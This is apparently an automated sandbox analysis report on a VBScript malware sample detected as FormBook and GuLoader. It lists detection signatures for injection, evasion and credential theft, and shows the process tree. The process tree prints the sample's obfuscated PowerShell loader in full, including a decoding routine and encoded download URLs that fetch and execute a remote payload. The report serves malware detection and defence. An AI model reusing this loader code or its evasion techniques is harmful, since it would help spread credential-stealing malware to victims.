Edit tour
Windows
Analysis Report
6 654398.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 3872 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\6 654 398.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 3688 cmdline:
ping gorme zl_6777.67 77.6777.67 7e MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 5452 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 7156 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" " <#Versfo ds Pudser Ringmrknin gs Gonitis Recuperab ility Sagg io Doceret #>;$Homop lasy='Sten kulsnaftas ';<#Rejice r Amanuens iser Manti cory #>;$F eminisere= $Oversalts +$host.UI; function Naturvrdi( $unmannerl iness){If ($Feminise re) {$vare ns++;}$Uen igst=$Etym ologiseren des+$unman nerliness. 'Length'-$ varens; fo r( $Erhold =4;$Erhold -lt $Ueni gst;$Erhol d+=5){$Gen erationspr ojekters=$ Erhold;$Lu cuma+=$unm annerlines s[$Erhold] ;$Bergensi sk='Costiv ely';}$Luc uma;}funct ion Furnag e($Lokumme t){ & ($Brnebal let) ($Lok ummet);}$P rereceived =Naturvrdi 'MaliM at io Hi,zSp. liFibrlBag mlTilkaExt e/Rytt ';$ Prereceive d+=Naturvr di ' Kyl5R ,ek.Bran0n eut Fo b(b ereWAfm i QuanFl.ld BrsoEstawU nlusC ch A ppeNSpheT et Howd1En ek0Him .Fl le0 tje;Re pr Oxy WC diiSkadnBe sk6Abor4Ca ll;Fors Fa stxStem6ga v.4Phan;St .u Prodr K iovGdni: B en1Grun3V sp1Su t.La nd0St r)M, sc SupeGHa ndeCatac.u ffkR cho V au/Su c2 C ar0 amp1Po si0Zirk0re g.1Fist0D ba1Vide F. anFSurviSe ngrMa,keRu tef edeoEs caxLe b/Ti ld1incu3Pa ra1Inde.Tr yp0Brod '; $Teosofis= Naturvrdi 'M.deuSchn sMicrEbebo RSprn-Till aSandG hag E S.eNOpga tWaba ';$S oybean=Nat urvrdi 'Re veh Fort.q uat.usqpKu ltsPros:Pr ef/ Ko./Un dewKat.wJa zzw Uda.Sh ,pgVermrP euoStoeuUd enpTh,or a mbi S ea B rumPsyc.Ud ycPaapoPa temCopr/Fi t.K P roir i,a ReplAf hji emtFea siTermougr nLkkeePro prcyst.Com ppUnsorBer rxId n>Ara bhEmbltSar otKommp fr ssanti: En t/Pu s/kal abS virDet au emtMo.s a.ent. isc p OlilMode /Be eKLept oTe aaKrus lcur.iFetc t,araiEter oPourn Okk eCha rSi,h .CocrpSprk rtankx Mer >behnhlagd tRevatprof pSludsReso :Brug/Prop / GeopOpta r UndoPrep mTaviePrec nOps,t Lr eBerer dob .Actir Ive sHaug/Irre KKineoPneu a failTri, i RhatAnke i AveoSlat nveroeFeud rVeli.Samm pdownr .ei xSnke ';$K nulling=Na turvrdi 'G eom>Bagg ' ;$Brneball et=Naturvr di 'Hun iI ncoeFri X Svu ';$Dep osito='Kal kudsivning ';$Mantele t70='\spge lseshistor ies.Hov';F urnage (Na turvrdi 'W o l$ RecgR maLsab OH ersBParaAH elll Ind:L otaPSpisR AutEOpskd ,irIOvercF rs,AplanBM ainlFiskeP res=Trai$ FrieLat nB runVDumb:B an a Bo pH elmpPr dDi aiA.ntrtT or A.arr+C loa$dioxmM echADiviNU dd Ttr,ne dlglOptiED ybstR ne7L nko0Tegn ' );Furnage (Naturvrdi 'Smas$Per cGO erLSau OElanBHje mAT apLSky g:Advio Ok sp No.tHyd rRUnfevU u nL cceUdsv t Opp2E cr 2Fors7Laud = H.r$ruel sI dvoOver YSoldBKors EPunca prk N Abl.Rven Stlpeptypo lBetoIFore tPaaf(,ekn $Unq kPutr nKittu kla LNondl.nam i.oncnFibr G Vid)El e ');Furnag e (Naturvr di 'Stan[ CorNI che, angtOv r.T estSKo te ApprOm gV ridiAppecK rnieE tepB esgoAkmui Batn MiltU krlM bacaS lannOphoaP olyG GkkeC olpRHydr]